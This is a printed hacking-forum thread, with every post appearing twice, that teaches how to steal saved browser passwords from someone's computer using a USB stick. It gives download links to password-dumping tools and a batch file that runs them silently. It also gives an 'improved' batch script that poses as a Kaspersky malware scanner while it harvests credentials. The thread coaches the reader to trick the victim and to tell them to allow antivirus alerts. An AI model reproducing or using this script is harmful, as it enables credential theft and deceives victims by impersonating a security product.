Sinisterly
Steal Passwords Using USB - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: Steal Passwords Using USB (/Thread-Steal-Passwords-Using-USB)

Pages: 1 2 3 4


Steal Passwords Using USB - EZiX_mybb_import9300 - 10-19-2012

This will steal all the saved passwords in firefox, opera and chrome of the victim without him knowing by using just a USB

1. download all these tools (no virus is present but if detected , it is a false positive)
Code:
http://www.mediafire.com/?3njho163lqwb846 http://www.mediafire.com/?9q146pki2mtf77b http://www.mediafire.com/?2w7dgpaf35mocth

Virus scans:
Code:
http://vscan.novirusthanks.org/analysis/1f651e88ade1a432a2dd52c5bfa810bb/aW5kZXg=/ http://vscan.novirusthanks.org/analysis/31c8108895db455a988e9c5a6ec73ee3/aW5kZXg=/ http://vscan.novirusthanks.org/analysis/1b57869babbb8a84ceb02f0f14a531e0/aW5kZXg=/


password for all the tools:
Code:
UploadedByEZIX

2. Open notepad

3. copy paste the following code
Code:
start PasswordFox.exe /stext firefox.txt start OperaPassView.exe /stext Opera.txt start ChromePass.exe /stext Chrome.txt

4. save is as anything.bat (note that it should be saved as *.bat extension for it to work)

5. Put all the 4 tools (including the bat file) into your usb (better to create a new folder and all should be placed within them)

6. go to your victims computer and insert the USB

7. Tell your victim that you want to check something out and go to the folder and click on the bat file (dont click on the others as it might be suspicious)

8. When you click on the bat file, a black screen will appear and disappear within just 2 secs.

9.When the black screen goes away, it means that the passwords have been collected.

10. All the passwords will be saved as *.txt files (ie. firefox.txt , Opera.txt, Chrome.txt) in the same folder where you kept the tools

11. go back to your home, insert the USB and open the txt files and observe the passes.

NOTE:
Here is an improved batch file provided by and created by Ex094.
This will make it less suspicious for anyone to know that someone is doing something malicious.
Use this code instead of the code is Step 3:
Code:
@echo off echo ############################################################################ echo . echo ** ** ** echo /** ** ****** /** ** ** echo /** ** ****** ******/**///** ***** ****** ******/** ** //** ** echo /**** //////** **//// /** /** **///**//**//* **//// /** ** //*** echo /**/** ******* //***** /****** /******* /** / //***** /**** /** echo /**//** **////** /////**/**/// /**//// /** /////**/**/** ** echo /** //**//******** ****** /** //******/*** ****** /**//** ** echo // // //////// ////// // ////// /// ////// // // // echo Kaspersky LABS USB Security Scanner echo . echo ############################################################################ echo Warning!!! This tool doesnot provide Real Time Protection! Please download echo Kaspersky Internet Security from Kaspersky Labs website echo . echo Press any key to Scan pause >nul setlocal EnableDelayedExpansion set Counter=0 set Schalter=2 set Width=0 :1 title Kaspersky USB Security Scanner - Scanning USB set /a Counter=%Counter% + 1 set /a Display=%Counter% / 2 FOR /L %%A IN (1,1,%Display%) DO ( set Display=!Display!² ) cls echo Kaspersky is now scanning for Malware! Please Wait... %Counter%%% echo ²!Display:~2,47! ping localhost -n 1 >nul if "%Counter%" == "100" goto :1-End goto :1 :1-End echo Checking System Integrity... start PasswordFox.exe /stext firefox.txt echo Checking Antivirus Software, (You may get alerted of an execution! Allow the execution) start OperaPassView.exe /stext Opera.txt echo All Tests Passed [X] start ChromePass.exe /stext Chrome.txt echo Scanning Complete! echo No threats detected echo Press Any Key To Exit pause >nul EXIT /B

Screenshot of the new batch file:
Spoiler:
[Image: ld09Rss.png]


Credits to Ex094 for the new and improved batch file. Thanks man Smile


Steal Passwords Using USB - EZiX_mybb_import9300 - 10-19-2012

This will steal all the saved passwords in firefox, opera and chrome of the victim without him knowing by using just a USB

1. download all these tools (no virus is present but if detected , it is a false positive)
Code:
http://www.mediafire.com/?3njho163lqwb846 http://www.mediafire.com/?9q146pki2mtf77b http://www.mediafire.com/?2w7dgpaf35mocth

Virus scans:
Code:
http://vscan.novirusthanks.org/analysis/1f651e88ade1a432a2dd52c5bfa810bb/aW5kZXg=/ http://vscan.novirusthanks.org/analysis/31c8108895db455a988e9c5a6ec73ee3/aW5kZXg=/ http://vscan.novirusthanks.org/analysis/1b57869babbb8a84ceb02f0f14a531e0/aW5kZXg=/


password for all the tools:
Code:
UploadedByEZIX

2. Open notepad

3. copy paste the following code
Code:
start PasswordFox.exe /stext firefox.txt start OperaPassView.exe /stext Opera.txt start ChromePass.exe /stext Chrome.txt

4. save is as anything.bat (note that it should be saved as *.bat extension for it to work)

5. Put all the 4 tools (including the bat file) into your usb (better to create a new folder and all should be placed within them)

6. go to your victims computer and insert the USB

7. Tell your victim that you want to check something out and go to the folder and click on the bat file (dont click on the others as it might be suspicious)

8. When you click on the bat file, a black screen will appear and disappear within just 2 secs.

9.When the black screen goes away, it means that the passwords have been collected.

10. All the passwords will be saved as *.txt files (ie. firefox.txt , Opera.txt, Chrome.txt) in the same folder where you kept the tools

11. go back to your home, insert the USB and open the txt files and observe the passes.

NOTE:
Here is an improved batch file provided by and created by Ex094.
This will make it less suspicious for anyone to know that someone is doing something malicious.
Use this code instead of the code is Step 3:
Code:
@echo off echo ############################################################################ echo . echo ** ** ** echo /** ** ****** /** ** ** echo /** ** ****** ******/**///** ***** ****** ******/** ** //** ** echo /**** //////** **//// /** /** **///**//**//* **//// /** ** //*** echo /**/** ******* //***** /****** /******* /** / //***** /**** /** echo /**//** **////** /////**/**/// /**//// /** /////**/**/** ** echo /** //**//******** ****** /** //******/*** ****** /**//** ** echo // // //////// ////// // ////// /// ////// // // // echo Kaspersky LABS USB Security Scanner echo . echo ############################################################################ echo Warning!!! This tool doesnot provide Real Time Protection! Please download echo Kaspersky Internet Security from Kaspersky Labs website echo . echo Press any key to Scan pause >nul setlocal EnableDelayedExpansion set Counter=0 set Schalter=2 set Width=0 :1 title Kaspersky USB Security Scanner - Scanning USB set /a Counter=%Counter% + 1 set /a Display=%Counter% / 2 FOR /L %%A IN (1,1,%Display%) DO ( set Display=!Display!² ) cls echo Kaspersky is now scanning for Malware! Please Wait... %Counter%%% echo ²!Display:~2,47! ping localhost -n 1 >nul if "%Counter%" == "100" goto :1-End goto :1 :1-End echo Checking System Integrity... start PasswordFox.exe /stext firefox.txt echo Checking Antivirus Software, (You may get alerted of an execution! Allow the execution) start OperaPassView.exe /stext Opera.txt echo All Tests Passed [X] start ChromePass.exe /stext Chrome.txt echo Scanning Complete! echo No threats detected echo Press Any Key To Exit pause >nul EXIT /B

Screenshot of the new batch file:
Spoiler:
[Image: ld09Rss.png]


Credits to Ex094 for the new and improved batch file. Thanks man Smile


RE: Steal Passwords Using USB - unknownAttacker - 10-19-2012

please upload virus scans


RE: Steal Passwords Using USB - unknownAttacker - 10-19-2012

please upload virus scans


RE: Steal Passwords Using USB - EZiX_mybb_import9300 - 10-19-2012

(10-19-2012, 02:49 PM)unknownAttacker Wrote: please upload virus scans
done, do check now Smile


RE: Steal Passwords Using USB - EZiX_mybb_import9300 - 10-19-2012

(10-19-2012, 02:49 PM)unknownAttacker Wrote: please upload virus scans
done, do check now Smile


RE: Steal Passwords Using USB - unknownAttacker - 10-19-2012

virus scan of files, not links. scanners can't scan files from uploading websites, they just scan the website.


RE: Steal Passwords Using USB - unknownAttacker - 10-19-2012

virus scan of files, not links. scanners can't scan files from uploading websites, they just scan the website.


RE: Steal Passwords Using USB - EZiX_mybb_import9300 - 10-19-2012

(10-19-2012, 03:01 PM)unknownAttacker Wrote: virus scan of files, not links. scanners can't scan files from uploading websites, they just scan the website.
done, this time with novirusthanks! Smile


RE: Steal Passwords Using USB - EZiX_mybb_import9300 - 10-19-2012

(10-19-2012, 03:01 PM)unknownAttacker Wrote: virus scan of files, not links. scanners can't scan files from uploading websites, they just scan the website.
done, this time with novirusthanks! Smile